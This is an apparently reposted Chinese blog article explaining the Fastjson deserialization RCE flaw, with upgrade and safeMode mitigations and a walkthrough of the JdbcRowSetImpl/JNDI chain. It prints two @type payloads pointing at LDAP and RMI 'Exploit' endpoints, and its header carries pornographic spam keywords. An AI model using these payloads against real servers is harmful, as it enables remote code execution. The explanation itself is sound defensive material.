国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Fastjson反序列化遠(yuǎn)程代碼執(zhí)行漏洞

這篇具有很好參考價(jià)值的文章主要介紹了Fastjson反序列化遠(yuǎn)程代碼執(zhí)行漏洞。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

據(jù)國(guó)家網(wǎng)絡(luò)與信息安全信息通報(bào)中心監(jiān)測(cè)發(fā)現(xiàn),開源Java開發(fā)組件Fastjson存在反序列化遠(yuǎn)程代碼執(zhí)行漏洞。攻擊者可利用上述漏洞實(shí)施任意文件寫入、服務(wù)端請(qǐng)求偽造等攻擊行為,造成服務(wù)器權(quán)限被竊取、敏感信息泄漏等嚴(yán)重影響。

先貼一個(gè)解決漏洞的方案:

1.升級(jí)到最新版本1.2.83
https://github.com/alibaba/fastjson/releases/tag/1.2.83

該版本涉及autotype行為變更,在某些場(chǎng)景會(huì)出現(xiàn)不兼容的情況,如遇遇到問題可以到
https://github.com/alibaba/fastjson/issues尋求幫助。

2.fastjson在1.2.68及之后的版本中引入了safeMode,配置safeMode后,無論白名單和黑名單,都不支持autoType,可杜絕反序列化Gadgets類變種攻擊(關(guān)閉autoType注意評(píng)估對(duì)業(yè)務(wù)的影響)。

開啟方法可參考
https://github.com/alibaba/fastjson/wiki/fastjson_safemode。

1.2.83修復(fù)了此次發(fā)現(xiàn)的漏洞,開啟safeMode是完全關(guān)閉autoType功能,避免類似問題再次發(fā)生,這可能會(huì)有兼容問題,請(qǐng)充分評(píng)估對(duì)業(yè)務(wù)影響后開啟。

3.可升級(jí)到fastjson v2
https://github.com/alibaba/fastjson2/releases

不過任何升級(jí)一定會(huì)伴隨或大或小的bug,一定要對(duì)業(yè)務(wù)的影響做評(píng)估。

下面對(duì)漏洞原理進(jìn)行介紹
fastjson 是阿里巴巴開發(fā)的 java語言編寫的高性能 JSON 庫(kù),用于將數(shù)據(jù)在 Json 和 Java Object之間相互轉(zhuǎn)換。它沒有用java的序列化機(jī)制,而是自定義了一套序列化機(jī)制。

JSON.toJSONString 和 JSON.parseObject/JSON.parse 分別實(shí)現(xiàn)序列化和反序列化

Fastjson反序列化需要無參默認(rèn)構(gòu)造方法或者注解指定構(gòu)造方法并添加相應(yīng)參數(shù)。使用Feature.SupportNonPublicField才能打開非公有屬性的反序列化處理,并且@type可以指定反序列化任意類調(diào)用其set,get方法,并且由于反序列化的特性,我們可以通過目標(biāo)類的set方法自由的設(shè)置類的屬性值。

究極原理:攻擊者準(zhǔn)備rmi服務(wù)和web服務(wù),將rmi絕對(duì)路徑注入到lookup方法中,受害者JNDI接口會(huì)指向攻擊者控制rmi服務(wù)器,JNDI接口向攻擊者控制web服務(wù)器請(qǐng)求,遠(yuǎn)程加載惡意代碼,執(zhí)行構(gòu)造函數(shù)形成RCE。

下面這兩個(gè)就是含有攻擊性的待序列化對(duì)象:@type注解指明了其類型(漏洞利用類),并設(shè)置了數(shù)據(jù)源和開啟自動(dòng)提交。

//LADP 方式
String payload1 = “{”@type":“com.sun.rowset.JdbcRowSetImpl”,“dataSourceName”:“l(fā)dap://localhost:1389/Exploit”," + " “autoCommit”:true}“;
//RMI 方式
String payload2 = “{”@type”:“com.sun.rowset.JdbcRowSetImpl”,“dataSourceName”:“rmi://localhost:1099/Exploit”," + " “autoCommit”:true}";

這就用到了JNDI。JNDI提供了 查找和訪問各種命名和目錄服務(wù)的通用、統(tǒng)一的接口。支持的服務(wù):DNS,LDAP,RMI,CORBA等。
它是面向拓展的,也就是說我定義了個(gè)規(guī)矩,就是 SPI的概念 ,具體如何實(shí)現(xiàn)由擴(kuò)展者實(shí)現(xiàn)。
Fastjson反序列化遠(yuǎn)程代碼執(zhí)行漏洞

(可以連按shift查找目標(biāo)類)
Fastjson反序列化遠(yuǎn)程代碼執(zhí)行漏洞
由于在反序列化時(shí)會(huì)調(diào)用set方法,此時(shí)conn一定為null,所以掉入陷阱,進(jìn)行connet設(shè)置,我們點(diǎn)進(jìn)去。
Fastjson反序列化遠(yuǎn)程代碼執(zhí)行漏洞
發(fā)現(xiàn)里面調(diào)用了lookup函數(shù),并且調(diào)用getDataSourceName獲取數(shù)據(jù)源,上面含有攻擊性的待序列化對(duì)象恰好就有DataSourceName這個(gè)屬性。
Fastjson反序列化遠(yuǎn)程代碼執(zhí)行漏洞
接下來就是請(qǐng)求rmi服務(wù)器,執(zhí)行rmi服務(wù)器下發(fā)的命令,從而導(dǎo)致遠(yuǎn)程命令執(zhí)行漏洞。文章來源地址http://www.zghlxwxcb.cn/news/detail-490445.html

到了這里,關(guān)于Fastjson反序列化遠(yuǎn)程代碼執(zhí)行漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Fastjson反序列化漏洞復(fù)現(xiàn)小結(jié)

    Fastjson反序列化漏洞復(fù)現(xiàn)小結(jié)

    簡(jiǎn)單來說:Fastjson是解析JSON格式的字符串的,允許用戶在輸入JSON串時(shí)通過“@type”鍵對(duì)應(yīng)的value指定任意反序列化類名,進(jìn)而執(zhí)行類里的惡意代碼。 1、Fastjson1.2.24遠(yuǎn)程代碼執(zhí)行(CNVD-2017-02833 ) 2、Fastjson=1.2.47遠(yuǎn)程代碼執(zhí)行漏洞(CNVD-2019-22238) 3、Fstjson =1.2.60 遠(yuǎn)程代碼執(zhí)行漏洞

    2023年04月08日
    瀏覽(25)
  • FastJson中AutoType反序列化漏洞

    FastJson中AutoType反序列化漏洞

    Fastjson1.2.80 反序列化漏洞情報(bào),攻擊者可以利用該漏洞攻擊遠(yuǎn)程服務(wù)器, 可能會(huì)造成任意命令執(zhí)行。在Fastjson=1.2.83的版本中,通過新的Gadgets鏈繞過autoType開關(guān),在autoType關(guān)閉的情況下仍然可能可以繞過黑白名單防御機(jī)制,實(shí)現(xiàn)了反序列化漏洞利用的遠(yuǎn)程代碼執(zhí)行效果,同時(shí),此

    2024年02月07日
    瀏覽(18)
  • Fastjson反序列化漏洞原理與復(fù)現(xiàn)

    Fastjson是java的一個(gè)庫(kù),可以將Java對(duì)象轉(zhuǎn)化為json格式的字符串,也可以將json格式的字符串轉(zhuǎn)化為Java對(duì)象。 Fastjson提供了 toJSONString() 和 parseObject() 方法來將Java對(duì)象與JSON相互轉(zhuǎn)換。調(diào)用 toJSONString() 方法即可將對(duì)象轉(zhuǎn)換成 JSON 字符串, parseObject() 方法則反過來將JSON字符串轉(zhuǎn)換成

    2024年02月12日
    瀏覽(39)
  • 滲透測(cè)試-Fastjson反序列化漏洞getshell

    滲透測(cè)試-Fastjson反序列化漏洞getshell

    目錄 前言 測(cè)試環(huán)境準(zhǔn)備 dnslog測(cè)試 搭建rmi服務(wù)器準(zhǔn)備惡意類 引用JdbcRowSetImpl攻擊 反彈shell$命令執(zhí)行 總結(jié) :fastjson 1.2.24反序列化導(dǎo)致任意命令執(zhí)行漏洞 注:本次滲透測(cè)試全在虛擬機(jī)中進(jìn)行僅用于學(xué)習(xí)交流,請(qǐng)勿在實(shí)際網(wǎng)絡(luò)中攻擊他人服務(wù)器。 前言 ????????最原始

    2024年02月07日
    瀏覽(31)
  • 【java安全】FastJson反序列化漏洞淺析

    【java安全】FastJson反序列化漏洞淺析

    0x00.前言 前面我們學(xué)習(xí)了RMI和JNDI知識(shí),接下來我們就可以來了解一下FastJson反序列化了 0x01.FastJson概述 FastJson是阿里巴巴的開源JSON解析庫(kù),它可以解析JSON格式的字符串,支持 將JavaBean序列化為JSON字符串,也可以將JSON字符串反序列化到JavaBean 0x02.FastJson使用 首先我們需要使用

    2024年02月11日
    瀏覽(33)
  • fastjson 1.2.24  反序列化漏洞(審計(jì)分析)

    fastjson 1.2.24 反序列化漏洞(審計(jì)分析)

    環(huán)境 JDK 8u181 Fastjson 1.2.24 POC 跟進(jìn) parse 方法 跟進(jìn)到底層deserialze 方法 Poc 中傳入的 dataSourceName : ldap://192.168.3.229:8084/vnSYPYwMs 值 這里實(shí)際對(duì)應(yīng) setDataSourceName 方法,調(diào)用此方法并傳入 ldap 跟進(jìn) setDataSourceName 方法,這里只是簡(jiǎn)單賦值 ? 步出回此方法 繼續(xù)步出,進(jìn)入parseRest方法 跟進(jìn)

    2023年04月14日
    瀏覽(37)
  • Fastjson反序列化漏洞(1.2.24 RCE)

    Fastjson反序列化漏洞(1.2.24 RCE)

    目錄 (一)Fastjson介紹 1、認(rèn)識(shí)Fastjson 1.1?序列化 1.2??反序列化 1.3?@type 自省 Autotype (二)漏洞原理 1、比較常用的攻擊類 1.1??com.sun.rowset.JdbcRowSetImpl 1.2?com.sun.org.apache.xalan.internal.xsltc.trax. TemplatesImp (三)1.2.24 RCE復(fù)現(xiàn) 1、vulnhub啟動(dòng) 注意:Linux配置JRE版本 2、攻擊機(jī)監(jiān)聽(

    2024年02月07日
    瀏覽(32)
  • fastJson反序列化漏洞和log4j漏洞

    有 attach.class (編譯好的文件) 攻擊者建立rmi服務(wù)端,于rmi服務(wù)端建造一系列攻擊對(duì)象 ,假設(shè)遠(yuǎn)程地址為 http://abc,可url鏈接到惡意class-attach.class 若被攻擊者訪問到此服務(wù) rmi://abc/attach.class ,靜態(tài)代碼塊會(huì)優(yōu)先加載,無需構(gòu)造對(duì)象。 fastJson通過序列化漏洞 fastJson=1.2.47 (高版本添

    2024年02月16日
    瀏覽(25)
  • Web攻防--JNDI注入--Log4j漏洞--Fastjson反序列化漏洞

    Web攻防--JNDI注入--Log4j漏洞--Fastjson反序列化漏洞

    什么是JNDI JNDI全稱為 Java Naming and Directory Interface(Java命名和目錄接口),是一組應(yīng)用程序接口,為開發(fā)人員查找和訪問各種資源提供了統(tǒng)一的通用接口,可以用來定義用戶、網(wǎng)絡(luò)、機(jī)器、對(duì)象和服務(wù)等各種資源。 JNDI支持的服務(wù)主要有:DNS、LDAP、CORBA、RMI等。 簡(jiǎn)單從安全角度

    2024年02月09日
    瀏覽(26)
  • Jboss(CVE-2017-12149)反序列化命令執(zhí)行漏洞

    Jboss(CVE-2017-12149)反序列化命令執(zhí)行漏洞

    該漏洞為 Java反序列化錯(cuò)誤類型,存在于 Jboss 的 HttpInvoker 組件中的 ReadOnlyAccessFilter 過濾器中。該過濾器在沒有進(jìn)行任何安全檢查的情況下嘗試將來自客戶端的數(shù)據(jù)流進(jìn)行反序列化,從而導(dǎo)致了漏洞。 受影響系統(tǒng)及應(yīng)用版本?? ?Jboss AS 5.x、Jboss AS 6.x 環(huán)境搭建 使用vulhub靶場(chǎng)

    2024年02月15日
    瀏覽(33)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包